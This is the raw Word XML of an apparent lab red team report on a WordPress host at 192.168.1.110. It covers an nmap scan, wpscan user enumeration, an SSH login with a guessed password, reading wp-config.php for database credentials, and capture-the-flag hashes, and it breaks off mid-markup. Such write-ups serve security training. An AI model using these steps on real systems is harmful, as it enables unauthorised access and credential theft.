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44364" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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</w:pPr>
      <w:r w:rsidRPr="005C53B2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  <w:t>Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A20D8" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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 w:rsidRPr="005C53B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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AC19C" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2882278F" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24346108" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B3FB5" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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5C53B2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Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9097E" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B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Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17950E2B" w14:textId="314B09BF" w:rsidR="0094772A" w:rsidRDefault="0094772A" w:rsidP="005C53B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C2F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C2F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F8CE1" w14:textId="0CD73C53" w:rsidR="005C2F26" w:rsidRDefault="005C2F26" w:rsidP="005C53B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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noProof/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3831E61D" wp14:editId="41D0ABB8">
            <wp:extent cx="5943600" cy="474408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66A1E" w14:textId="77777777" w:rsidR="005C2F26" w:rsidRDefault="005C2F26" w:rsidP="005C53B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6938E341" w14:textId="7D588BC1" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B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This scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46732767" w14:textId="7B47D38E" w:rsidR="005C53B2" w:rsidRDefault="005C7BF7" w:rsidP="005C7BF7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-</w:t>
      </w:r>
      <w:r w:rsidR="005C53B2" w:rsidRPr="005C53B2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD91E33" w14:textId="0195149E" w:rsidR="005C7BF7" w:rsidRDefault="005C7BF7" w:rsidP="005C7BF7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Port 22/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8D932" w14:textId="77777777" w:rsidR="00154A85" w:rsidRPr="00154A85" w:rsidRDefault="00154A85" w:rsidP="00154A85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154A85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 80/TCP Open HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0F9AD" w14:textId="77777777" w:rsidR="00154A85" w:rsidRPr="00154A85" w:rsidRDefault="00154A85" w:rsidP="00154A85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154A85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 111/TCP Open rcpbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E97499F" w14:textId="77777777" w:rsidR="00154A85" w:rsidRPr="00154A85" w:rsidRDefault="00154A85" w:rsidP="00154A85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154A85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 139/TCP Open netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21047643" w14:textId="6F9DF11C" w:rsidR="00154A85" w:rsidRPr="00143700" w:rsidRDefault="00154A85" w:rsidP="00143700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154A85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 445/TCP Open netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9F876" w14:textId="574091B2" w:rsidR="00143700" w:rsidRPr="00143700" w:rsidRDefault="00143700" w:rsidP="0014370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143700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 xml:space="preserve">Critical Vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBED46" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B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The following vulnerabilities were identified on each target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A8E3E" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="00F65E38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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2367CD29" w14:textId="3DD047D3" w:rsidR="00F65E38" w:rsidRDefault="00F65E38" w:rsidP="00F65E38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Weak User Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58078198" w14:textId="5A4B74E6" w:rsidR="00F65E38" w:rsidRDefault="00F65E38" w:rsidP="00F65E38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Unsalted User Password Hash </w:t>
      </w:r>
      <w:r w:rsidR="005B6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(WordPress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC81E5" w14:textId="1F71BD45" w:rsidR="005B6DCF" w:rsidRDefault="005B6DCF" w:rsidP="00F65E38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Misconfiguration of User Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C707A8A" w14:textId="3D0D04EE" w:rsidR="00565DB2" w:rsidRPr="00F65E38" w:rsidRDefault="00565DB2" w:rsidP="00F65E38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User Enumeration (WordPress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7F2D4" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C53B2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688617D5" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B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The Red Team was able to penetrate </w:t>
      </w:r>
      <w:r w:rsidRPr="005C53B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w: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 and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D302D" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2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color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E1A78" w14:textId="1F818AD4" w:rsidR="005C53B2" w:rsidRPr="002E721C" w:rsidRDefault="005C53B2" w:rsidP="002E721C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E721C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002E721C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidR="002E721C" w:rsidRPr="002E721C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag1: b9bbcb33ellb80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A4BA0" w14:textId="77777777" w:rsidR="005C53B2" w:rsidRPr="005C53B2" w:rsidRDefault="005C53B2" w:rsidP="005C53B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8437C0" w14:textId="7D919414" w:rsidR="005C53B2" w:rsidRPr="00EB4A1F" w:rsidRDefault="00535269" w:rsidP="005C53B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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Used the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidR="00C07EC0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for Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01422366" w14:textId="0778911A" w:rsidR="00EB4A1F" w:rsidRDefault="00EB4A1F" w:rsidP="00EB4A1F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37635595" wp14:editId="76115396">
            <wp:extent cx="5943600" cy="402272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9100" w14:textId="72FACD33" w:rsidR="00EB4A1F" w:rsidRPr="00BA736F" w:rsidRDefault="00EB4A1F" w:rsidP="00EB4A1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Command that I used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00535128">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00535128">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA736F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00535128">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA736F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.110/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA736F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="662A5655" w14:textId="77777777" w:rsidR="00BA736F" w:rsidRDefault="00BA736F" w:rsidP="00BA736F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65C3625D" w14:textId="33E93F09" w:rsidR="00BA736F" w:rsidRDefault="004B41DA" w:rsidP="004B41DA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Targeting Michael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F549A27" w14:textId="5E8DDB99" w:rsidR="004B41DA" w:rsidRDefault="001A6B75" w:rsidP="00E807F2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I </w:t>
      </w:r>
      <w:r w:rsidR="007712B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Guessed Michael’s password would be his name. </w:t>
      </w:r>
      <w:r w:rsidR="00952AEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>His password was weak and noticeable</w:t>
      </w:r>
      <w:r w:rsidR="003E3DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C64A5" w14:textId="4AC5E9C6" w:rsidR="003E3DEE" w:rsidRDefault="003E3DEE" w:rsidP="00D5225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D5225E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Captured Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA251A0" w14:textId="6FEBBC0C" w:rsidR="00D5225E" w:rsidRDefault="00D5225E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Used commands ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="001D04F4" w:rsidRPr="00416CA0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>michael@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47D8E7D1" w14:textId="032E632A" w:rsidR="001D04F4" w:rsidRDefault="006B20CD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pw:</w:t>
      </w:r>
      <w:r w:rsidR="001A6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Michael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60683954" w14:textId="3A5EB41C" w:rsidR="006B20CD" w:rsidRDefault="006B20CD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cd ../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02154279" w14:textId="0930635A" w:rsidR="006B20CD" w:rsidRDefault="006B20CD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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cd../</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F7AB6D3" w14:textId="77D179AB" w:rsidR="00FC25EF" w:rsidRDefault="00FC25EF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cd var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A8A59" w14:textId="72A4E3DF" w:rsidR="00FC25EF" w:rsidRDefault="00274255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ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0370B" w14:textId="1E3C9A72" w:rsidR="00274255" w:rsidRDefault="003D09DD" w:rsidP="00D5225E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5FDC8AE" wp14:editId="1CC66ABC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3323955</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2509840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="38100" t="38100" r="57150" b="5715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FDA35D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261.05pt;margin-top:196.9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">
                <v:imagedata r:id="rId9" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00274255">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nano service.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F1D78" w14:textId="38D1A4EF" w:rsidR="00CD7E77" w:rsidRPr="00CD7E77" w:rsidRDefault="003D09DD" w:rsidP="00CD7E77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DB127F6" wp14:editId="24A702CE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1171818</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2596523</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2756880" cy="209160"/>
                <wp:effectExtent l="57150" t="38100" r="24765" b="5778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756880" cy="20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A89FD7" id="Ink 5" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:91.55pt;margin-top:203.75pt;width:218.5pt;height:17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">
                <v:imagedata r:id="rId11" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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21C472FC" wp14:editId="093E691C">
            <wp:extent cx="5943600" cy="3745865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3A3F1" w14:textId="6D4E9222" w:rsidR="005C53B2" w:rsidRPr="00CD589B" w:rsidRDefault="005C53B2" w:rsidP="00CC7976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F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD589B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD589B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidR="00CC7976" w:rsidRPr="00CD589B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fc3fd58dcdad9ab23faca6e9a3e581c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAE5B5" w14:textId="28F9CEF3" w:rsidR="00251121" w:rsidRDefault="005C53B2" w:rsidP="00251121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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C53B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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C973C6" w14:textId="11E50B44" w:rsidR="00251121" w:rsidRDefault="00EA226C" w:rsidP="00251121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Used the same exploits for flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7616B" w14:textId="1C1F7ABE" w:rsidR="0085728F" w:rsidRDefault="0085728F" w:rsidP="0085728F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB49952" wp14:editId="0D0C6A3F">
            <wp:extent cx="5943600" cy="3820795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="6" name="Picture 6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 shot of a computer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9F174" w14:textId="619CD275" w:rsidR="0085728F" w:rsidRDefault="0085728F" w:rsidP="0085728F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5842B93B" wp14:editId="0547214B">
            <wp:extent cx="5995283" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="571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183" cy="70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A7516" w14:textId="014DD6BE" w:rsidR="001A6B75" w:rsidRDefault="004F0160" w:rsidP="0085728F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Flag3: </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0160">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>afc01ab56b50591e7dccf93122770cd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4CB48" w14:textId="5466EFA1" w:rsidR="004F0160" w:rsidRDefault="004F0160" w:rsidP="0085728F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Exploits Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B902E9" w14:textId="59B245F4" w:rsidR="006257A9" w:rsidRDefault="006257A9" w:rsidP="006257A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Once having found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the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wp-config.php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file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and </w:t>
      </w:r>
      <w:r w:rsidR="00D95F9D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>was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 able to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gain access to the database credentials as </w:t>
      </w:r>
      <w:r w:rsidR="00D95F9D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the user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Michael, </w:t>
      </w:r>
      <w:r w:rsidR="00D95F9D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I then activated the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>MySQL was used to explore the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED01EA" w14:textId="77777777" w:rsidR="009363D0" w:rsidRPr="006257A9" w:rsidRDefault="009363D0" w:rsidP="009363D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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34B1878D" w14:textId="2DEA2AD2" w:rsidR="006257A9" w:rsidRDefault="006257A9" w:rsidP="006257A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:num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Flag 3 was found in </w:t>
      </w:r>
      <w:r w:rsidR="009363D0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the 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wp_posts table in the </w:t>
      </w:r>
      <w:r w:rsidR="009363D0" w:rsidRPr="006257A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="006257A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28DBED" w14:textId="77777777" w:rsidR="00515299" w:rsidRPr="00515299" w:rsidRDefault="00515299" w:rsidP="00515299">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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21337554" w14:textId="591335E5" w:rsidR="00515299" w:rsidRDefault="00EC0F6E" w:rsidP="00515299">
      <w:p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1077805" wp14:editId="09EAA972">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
